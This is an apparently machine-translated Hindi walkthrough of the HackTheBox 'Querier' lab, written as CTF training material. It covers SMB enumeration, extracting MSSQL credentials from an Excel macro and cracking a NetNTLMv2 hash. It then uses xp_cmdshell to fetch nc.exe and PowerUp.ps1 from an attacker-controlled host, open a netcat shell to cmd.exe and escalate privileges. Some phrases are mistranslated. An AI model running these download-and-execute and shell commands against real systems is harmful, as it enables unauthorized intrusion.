Pentest "Hackthebox - Querier" के लिए प्रयोगशाला मशीन का मार्ग

नमस्कार, हेब्र! इस आलेख में, आप MsSQL की सुविधाओं का उपयोग करके दूरस्थ सर्वर पर हमला करने की एक विधि के बारे में जानेंगे, सिस्टम में फिक्सिंग के लिए एक रिवर्स शेल बना सकते हैं, और विंडोज में एक खराब कॉन्फ़िगर समूह नीति के संचालन का एक उदाहरण।

कटौती के तहत, हम Hackthebox पोर्टल पर Querier प्रयोगशाला मशीन को पारित करने के हमारे अनुभव के बारे में बात करेंगे।

उन लोगों के लिए जो यह नहीं जानते कि हैकबॉक्स क्या है, यह एक ऐसा पोर्टल है जहां आप अभ्यास में अपने सबसे अच्छे कौशल का परीक्षण कर सकते हैं, स्वयं सीटीएफ कार्य और प्रयोगशाला मशीनें हैं।

जानकारी जुटाना

पोर्ट नैपिंग के साथ पोर्ट स्कैनिंग शुरू करके हमारी खोज शुरू करें।

nmap –sC –Pn –A 10.10.10.125 

हमने पाया बंदरगाहों की सूची।

139/445 / tcp (smb) की गणना करें

हम SMB सर्वर संसाधनों तक पहुंचने के लिए smbclient उपयोगिता का उपयोग करेंगे।

 smbclient –L //10.10.10.125 

सभी संसाधनों के माध्यम से जाने के बाद, हम रिपोर्ट निर्देशिका में "मुद्रा वॉल्यूम Report.xlsm" फ़ाइल ढूंढते हैं।



यदि आप मानक Microsoft Excel के साथ इस फ़ाइल को खोलते हैं, तो यह पहली नज़र में पूरी तरह से खाली दिखाई देगा ।

हम बिनवॉक उपयोगिता का उपयोग करके फ़ाइल का विश्लेषण करते हैं, जो आपको xlsm दस्तावेज़ की एम्बेडेड फ़ाइलों को देखने में मदद करेगा।



बिनवॉक के आउटपुट से, हमें xlsm में निहित कुछ दिलचस्प फाइलें मिलीं।
-ई ध्वज का उपयोग करना, इसे अनपैक करना।

 binwalk –e Currency\ Volume\ Report.xlsm 

अब हम स्ट्रैंथ यूटिलिटी को आउटपुट प्रिंटेड कैरेक्टर्स के लिए इस्तेमाल करेंगे। फ़ाइलों के माध्यम से जा रहे हैं, हम vbaProject.bin में दिलचस्प डेटा पाते हैं। ऐसा लगता है कि हमें mssql सर्वर के लिए क्रेडेंशियल्स मिल गए।



वर्तमान में प्राप्त जानकारी को संक्षेप में प्रस्तुत करने के लिए:

• हम जानते हैं कि mssql सर्वर 10.10.10.125:1433 पोर्ट पर घूम रहा है;
• हमारे पास उपयोगकर्ता mssql सर्वर से क्रेडेंशियल हैं।

तो आइए इम्पैक्ट मॉड्यूल से स्क्रिप्ट का उपयोग करके सर्वर से कनेक्ट करने का प्रयास करें।

 python mssqlclient.py QUERIER/reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth 

MsSQL तक पहुँच प्राप्त करें।

MsSQL की गणना करें

हम लेख से कमांड का उपयोग करके हमारे लिए उपयोगी जानकारी सूचीबद्ध करते हैं।
SQLi निष्पादित करने के बाद, हमें उपयोगकर्ता mssql-svc के पासवर्ड से एक हैश मिलता है।



पासवर्ड को स्पष्ट रूप से प्राप्त करने के लिए, आपके लिए सुविधाजनक किसी भी उपकरण का उपयोग करके इसे निकालना आवश्यक है।

1.  john --format=netntlmv2 hash.txt 

2.  hashcat -m 5600 -a 3 hash.txt 

हमें mssql-svc से पासवर्ड मिलता है ।

नए क्रेडेंशियल ऋण के साथ SQL से कनेक्ट करना।

 python mssqlclient.py QUERIER/mssql-svc:'corporate568'@10.10.10.125 -windows-auth 

इस उपयोगकर्ता के अधिकार हमें xp_cmdshell को निष्पादित करने की अनुमति देते हैं

रिवर्स शेल प्राप्त करें

हम नेटकैट के माध्यम से शेल प्राप्त करने की कोशिश कर रहे हैं, इसके लिए हमें इसे हमले वाले सर्वर पर अपलोड करना होगा।

हम अपनी मशीन पर उस डायरेक्टरी में जाते हैं, जहाँ netcat स्थित है और चलती है:

 python –m SimpleHTTPServer 

Mscql शेल में दूरस्थ सर्वर पर netcat (nc.exe) डाउनलोड करने के लिए, पॉवरशेल कमांड चलाएं, सेव पथ निर्दिष्ट करें।

 xp_cmdshell "powershell.exe Invoke-WebRequest "http://10.10.xx:8000/nc.exe" – OutFile "C:\Users\mssql-svc\Desktop\nc.exe" " 

हम पोर्ट 4444 पर सुनने के लिए नेटकैट शुरू करते हैं।

 xp_cmdshell "powershell C:/Users/mssql-svc/Desktop/nc.exe -l -p 4444 -e cmd.exe" 

हम अपनी तरफ से नेटकैट शुरू करते हैं, हमले वाले सर्वर के आईपी और पोर्ट को निर्दिष्ट करते हैं और शेल प्राप्त करते हैं।

 nc 10.10.10.125 4444 

विशेषाधिकार बढ़ाने के लिए PowerShellMafia से स्क्रिप्ट चलाएँ।

 powershell.exe IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.xx:8000/PowerUp.ps1\"); Invoke-AllChecks 

स्क्रिप्ट के परिणामस्वरूप, हमें व्यवस्थापक क्रेडेंशियल्स मिल गए।

हम नए क्रेडेंशियल्स और अनुमतियों के साथ smb संसाधनों पर जाते हैं।





Root.txt फ्लैग लें। जीत!